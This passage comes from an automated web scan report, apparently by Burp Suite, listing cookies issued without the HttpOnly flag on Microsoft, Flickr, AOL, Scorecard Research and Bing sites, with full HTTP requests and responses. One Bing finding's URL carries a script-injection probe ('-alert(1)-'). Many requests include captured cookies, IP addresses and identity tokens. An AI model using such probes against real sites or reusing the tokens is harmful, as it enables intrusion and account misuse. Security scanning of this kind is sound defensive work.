pv1="b!!!!3!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!!Rl,!$5*F!$obP!0pb_!%S@P!!H<)!?5%!'2^c5!?Q8(!'^8i~~~~~~~<sIVw<uRx$!!!([!!v#F#IxPE!$Wiw!(^yZ!#PIK!!!%%!?5%!$px$-!w1K*!%0]Y!%7E2!$/h8~~~~~<rmNa~~!#R%`!!!%O!$V-H!104]!$i6`!#:m1!?5%!'Ng`4!@Dj0!'%it~~~~~~~<s0w(<t/^B!!!([!!qy:!$5*F!$6>P!1%3E!$Zu6!!!!$!?5%!'2^c5!?Q8(!%Q#<~~~~~~~<sIR8<tH8R!!!([!!)Ko!,Y+@!$XwQ!0S?n!%T.a~!#My1$qF>4!ZmB)!!gsP!'_6s~~~~~~<sGBJ<uDg%M.jTN!#dfo!!%f!!#@Z$!0wR)!%R^J!!H<)!?5%!(h(-8!ZmB)!$]#Q!']P]~~~~~~<s2oS<wFY^!!.vL!#*20~!$r*E!0(xK!$ud#!!mT-!?5%!*)IX>!wVd.!%tka!'*BV!%r?`~~~~~<sAqO~~!!mmF~!$r*E!/$s$!%*%/!$S`>!?5%!*)IX>!wVd.!%tka!!Jo4!')>6~~~~~<sAq^~M.jTN!!qrZ!!E)(!$[Rn!/`ni!%1)c!!!!$!?5%!$qF>1!i=9S!!28s!'22D~~~~~~<sGBL<s`:GM.jTN!$!VB!!#/S!$k.N!11oZ!%Y+B!!H<)!?5%!'2^c5!w1K*!'QTP!'eHF!%f(E~~~~~<sIOv<tH68!!!(["; ih="b!!!#!!%?RR!!!!'<rmNX!%?Rl!!!!'<sJ<p!%?m7!!!!#<p]i+!'4A7!!!!%<rmNV!'4A9!!!!%<rmNV!(4uP!!!!#<p^*H!(^yZ!!!!#<rmNa!)AU6!!!!#<roWR!)AU7!!!!$<sIR8!)Mx'!!!!#<roXY!)Mx)!!!!$<ro^y!)Mx+!!!!#<ro^?!*rnf!!!!#<pv/a!+%qh!!!!#<s2o:!+%qt!!!!#<roWO!,?Kj!!!!$<pN)1!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!-<)d!!!!#<sIWD!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.$Cj!!!!$<roX5!.$Cl!!!!#<sIVu!.$Cr!!!!#<qc=7!.?u0!!!!#<sAqM!.L'V!!!!#<rasm!.SpC!!!!#<rat%!.T5l!!!!$<sIOn!.V[>!!!!#<sGAt!.^#V!!!!#<sAqY!.`'5!!!!$<qd6G!.`.T!!!!#<rAKN!.kF<!!!!#<sAqf!.pj#!!!!#<sAqZ!/$s$!!!!#<sAq^!/-R3!!!!#<sGC-!/44k!!!!#<sGB2!/NRu!!!!#<sG..!/U%d!!!!#<ro^r!/`ni!!!!#<sGBL!/maq!!!!#<sGC.!/o!S!!!!#<sJ<'!/x2i!!!!#<sGC,!0(6l!!!!#<p]b^!0(xK!!!!#<sAqO!0.*I!!!!#<sHjL!0.2@!!!!#<pqfN!04O,!!!!#<sAqN!08Fh!!!!#<ro^P!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0OD/!!!!#<sAqR!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0S3y!!!!#<qd4F!0S?n!!!!'<sGBJ!0a-T!!!!#<sGB^!0cn'!!!!#<q*ty!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg!0eUu!!!!$<roWj!0oZP!!!!#<qc=9!0paE!!!!#<roWl!0pb_!!!!#<sIVw!0pbc!!!!$<qd6K!0pd7!!!!#<s0up!0qVB!!!!#<sGAv!0vr,!!!!$<raoq!0wR)!!!!#<s2oS!1$6k!!!!#<s2HA!1%3A!!!!#<roX5!1%3E!!!!#<sIR8!1%3H!!!!$<s0tI!1(-6!!!!#<rmN+!1,h*!!!!$<ro^R!1/X3!!!!(<rmb3!1/X6!!!!)<rmb2!1/]r!!!!(<rmb3!100n!!!!#<roWS!104]!!!!#<s0w(!104d!!!!$<s0t-!11oZ!!!!#<sIOv!1:dV!!!!#<rmMp"; BX=6l13v316lnh2l&b=4&s=8i&t=47

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:22 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%3!!!?I!!!!/<qd67!!%#4!!7(q<o_%.!!)OU!!!!$<ro^P!!)Qf!!!!(<nTlX!!*cu!!!!3<qd68!!*oY!!!!%<pN)4!!-?2!!!!*<pN)4!!-Oo!!!!#<nsgt!!/DA!!!!3<qd67!!/Hd!!!!2<qd67!!/He!!!!2<qd68!!04Z!!!!#<qgdp!!1CD!!!!#<p]be!!1Mv!!!!)<qPUB!!1N=!!!!'<qPUB!!1NO!!!!$<qPUB!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!5<qd67!!3)?!!!!5<qd67!!3)C!!!!5<qd68!!496!!!!.<s#)C!!4@a!!!!#<q)L?!!4i7!!!!#<qbhM!!4oZ!!!!#<nA,w!!?VS!!<NC<qDX7!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N]q!!!!$<qc5_!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!(<qd68!!Ra#!!!!(<qd68!!Ra)!!!!(<qd68!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!![@p!!!!$<qd4F!!bu:!!!!)<pjWE!!itb!!!!6<qd67!!j,.!!<NC<qDX7!!jW8!!!!)<pjWE!!pkJ!!!!6<qd67!!pkL!!!!6<qd68!!qrq!!!!6<qd67!!qrr!!!!6<qd67!!qrv!!!!6<qd68!!qyo!!!!2<qd68!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!uby!!!!$<rsNj!!xV'!!!!#<qBrC!!xV=!!!!#<qBs(!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq>!!!!+<s2p/!!yq?!!!!#<pOO/!###L!!!!#<qNtp!##ah!!!!#<pqhD!#(x0!!!!(<pLo[!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0fP!!!!$<qd68!#0fR!!!!$<qd67!#0fW!!!!$<qd68!#0mN!!!!#<nAwa!#16I!!<NC<qDX7!#17A!!7(q<o_%.!#2._!!!!$<qPUB!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#4FH!!!!#<s#'h!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#DL-!!!!#<s#7!!#HhJ!!!!#<qX-f!#I=D!!!!$<pd+P!#Jrp!!!!#<s#)0!#K?^!!!!'<p_19!#L*a!!!!6<qd67!#LI/!!!!#<p]be!#MTC!!!!6<qd68!#MTF!!!!*<q*ty!#MTH!!!!6<qd67!#MTI!!!!6<qd67!#MTJ!!!!6<qd68!#M]c!!!!)<pjWE!#Ms!!!!!#<rao$!#N+W!!!!#<qPUB!#O60!!!!#<nAwa!#O@L!!<NC<qDX7!#O@M!!<NC<qDX7!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#Q@W!!!!$<rsC*!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#R!r!!!!#<scx=!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#UF1!!!!$<s#._!#VDX!!!!#<q4hD!#VRb!!!!#<nAv7!#X.$!!!!$<rsC*!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#avQ!!!!#<rsC3!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#cCm~~!#dCX!!!!#<s!iX!#e(n!!!!#<qNNv!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f-v!!!!%<ro^u!#f.)!!!!$<ro^u!#f.+!!!!$<ro^u!#f__!!!!#<pd^@!#ffc!!!!#<s0w$!#fle!!!!#<s#7!!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#n`5!!!!$<s2Fd!#pRK!!!!#<rsNk!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#quh!!!!$<s2Fe!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; path=/; expires=Mon, 25-Mar-2013 20:36:22 GMT
Set-Cookie: BX=6l13v316lnh2l&b=4&s=8i&t=47; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 26 Mar 2011 20:36:22 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
15.22. http://advertising.microsoft.com/search-advertising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /search-advertising

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search-advertising?s_cid=us_bing_footer HTTP/1.1
Host: advertising.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/22/2011 21:02:41&Microsoft.VisitStartDate=03/22/2011 21:02:41&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=22&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1300816975750:ss=1300816958515; MS0=38ceddfa393547488a60161c1088230a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Mar 2011 00:58:45 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ExternalOmnitureTrackingCode=us_bing_footer; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:58:44 GMT
Content-Length: 59618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=
...[SNIP]...
15.23. http://api.flickr.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /clientaccesspolicy.xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=59mpc5d6lt8hn&b=3&s=c8; localization=en-us%3Bus%3Bus

Response

HTTP/1.0 404 Not Found
Date: Sat, 26 Mar 2011 01:40:32 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 25-Mar-2014 01:40:32 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Fri, 26-Mar-2010 01:40:31 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Fri, 26-Mar-2010 01:40:31 GMT; path=/; domain=flickr.com
X-Served-By: www20.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Length: 2211
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Flickr API: Page not found</title>
   <link href="http://l.yimg.com/g/css/c_flickr.css.v101414.17" rel="styleshe
...[SNIP]...
15.24. http://b.aol.com/vanity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.aol.com
Path:   /vanity/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1301171798557&h=www.aol.com&v=10&t=AOL.com%20-%20News%2C%20Sports%2C%20Weather%2C%20Entertainment%2C%20Local%20%26%20Lifestyle&r=&l=0&ms=1&dL_ch=us.aolportal&dL_dpt=main5%20AOL.com%205.0%20Main&template=maing-grid7&cobrand=main5&plids=43050%7Cwelcome-messaging%7Cnull%7C2%2C50380%7Ctrending-stories%7Ccol3%7C7%2C31799%7Csign-in-sign-out%7Cnull%7C3%2C12666%7Cbrand-6%7Cfooter%7C1%2C10699%7Cbrand-5%7Cfooter%7C1%2C51754%7Cqnav-radio%7Cnull%7C7%2C8821%7Cbrand-8%7Cfooter%7C1%2C51659%7Cspecial-events-11%7Ccol3%7C4%2C51753%7Cqnav-aim%7Cnull%7C7%2C51734%7Cfooterlinks%7Cfooter%7C2%2C10694%7Cbrand-1%7Cfooter%7C1%2C51932%7Cdaily-buzz4%7Ccol2%7C2%2C42766%7Cfeatured-brands%7Cfooter%7C1%2C51933%7Cdaily-buzz2%7Ccol2%7C2%2C20322%7Cweather%7Cnull%7C4%2C8903%7Cbrand-7%7Cfooter%7C1%2C18826%7Centertainment-news%7Ccol1R%7C6%2C51729%7Cdirectory%7Ccol1L%7C1%2C48051%7Cfollow-me-module%7Ccol3%7C6%2C51771%7Cstandalonevj%7Ccol2%7C1%2C8897%7Cbrand-9%7Cfooter%7C1%2C50259%7Cspecial-events-12%7Ccol3%7C4%2C8899%7Cbrand-3%7Cfooter%7C1%2C8875%7Cbrand-4%7Cfooter%7C1%2C50033%7Cmore-news%7Ccol1R%7C1%2C49721%7Cmore-news%7Ccol1R%7C1%2C51114%7Ctrending-stories-feed%7Ccol3%7C7%2C51822%7Cdaily-buzz5%7Ccol2%7C2%2C22965%7Centertainment-news%7Ccol1R%7C6%2C47495%7Cstock-markets-interestrates%7Ccol1R%7C3%2C42552%7Clogo%7Cnull%7C5%2C51824%7Cdaily-buzz1%7Ccol2%7C2%2C51905%7Cdaily-buzz3%7Ccol2%7C2%2C51906%7Csports-news%7Ccol1R%7C5%2C51721%7Cprodsvcs%7Ccol1L%7C2%2C51915%7Clocal%7Ccol1R%7C2%2C51785%7Ctrending-now%7Ccol3%7C8%2C51148%7Cvideo-promo2%7Ccol3%7C9%2C51937%7Cdl1%7Cdl-wide%7C1%2C8826%7Cbrand-2%7Cfooter%7C1%2C51144%7Cvideo-promo1%7Ccol3%7C9%2C48762%7Cbusiness-news%7Ccol1R%7C4%2C47438%7Cqnav-mail%7Cnull%7C7%2C51145%7Cvideo-promo3%7Ccol3%7C9%2C51886%7Cbusiness-news%7Ccol1R%7C4%2C51142%7Cvideo-feature%7Ccol3%7C9 HTTP/1.1
Host: b.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; s_pers=%20s_getnr%3D1300982991291-Repeat%7C1364054991291%3B%20s_nrgvo%3DRepeat%7C1364054991293%3B; MUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.6ef0; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:52 GMT
Server: Apache
Set-Cookie: MUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.6ef0; expires=Sun, 25-Sep-2011 11:30:15 GMT; path=/; domain=b.aol.com
Set-Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; expires=Sun, 25-Sep-2011 11:30:15 GMT; path=/; domain=.aol.com
Set-Cookie: CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; expires=Sun, 27-Mar-2011 08:35:52 GMT; path=/; domain=.aol.com
Cache-Control: max-age=0
Expires: Sat, 26 Mar 2011 20:35:52 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;
15.25. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=&rn=0.8909073872491717&c7=http%3A%2F%2Fexplore.live.com%2Fmicrosoft-service-agreement%3Fref%3Dnone%26mkt%3Den-us&c3=&c4=wldown&c5=&c6=&c10=&c15=&c16=&c8=Microsoft%20Service%20Agreement&c9=&cv=1.7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://explore.live.com/microsoft-service-agreement?ref=none&mkt=en-us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 26 Mar 2011 00:58:50 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Mon, 25-Mar-2013 00:58:50 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

15.26. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=3&c2=6034986&c3=UMAA-UMA-095-33-MRT&c4=STND_MFESRP_FY11H2_BR_CusSrch_1x1&c5=302283223&c6=&cj=1&rn=475410539656877500 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 26 Mar 2011 20:36:08 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Mon, 25-Mar-2013 20:36:08 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
15.27. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=desoundings&d.x=95494307&d.t=page&d.u=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F%27%2BNSFTW%2B%27%3Fordering%3D%26searchphrase%3Dall HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 25 Mar 2011 19:13:28 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 24-Mar-2013 19:13:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
15.28. http://bing.com//us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   //us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET //us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLS HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
